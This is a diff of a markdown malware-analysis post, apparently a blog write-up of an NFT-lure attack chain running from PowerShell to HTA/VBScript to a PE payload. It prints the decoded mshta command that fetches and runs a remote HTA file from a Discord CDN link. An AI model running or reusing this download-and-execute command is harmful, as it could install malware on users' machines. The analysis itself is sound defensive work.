splashdot/splashdot.github.io/NFT/index.md

 ![alt text](https://raw.githubusercontent.com/splashdot/splashdot.github.io/master/NFT/images/powershell_shortcut.png)<br />

 The smaller one (`$ac`) translates to `IEX`, while the other (`$es`) is `mshta https://cdn.discordapp.com/attachments/930485322846986240/930495210625064990/pngsuka.hta`.
-So, the script downloads and executes an HTA application. `pngsuka.hta` contains obfuscated VBScript (which is trivial to deobfuscate), and it's around 600 lines long.
+So, the script downloads and executes an HTA application. `pngsuka.hta` contains obfuscated VBScript, and it's around 600 lines long.
 Much like the initial PowerShell, this VBScript translates a long array into characters and executes it.
 The result is yet more obfuscated PowerShell, that aims at downloading, saving and executing a PE file from a Discord CDN.
 The function responsible for downloading and executing the file is displayed in the following image.

 ![alt text](https://raw.githubusercontent.com/splashdot/splashdot.github.io/master/NFT/images/powershell.png)<br />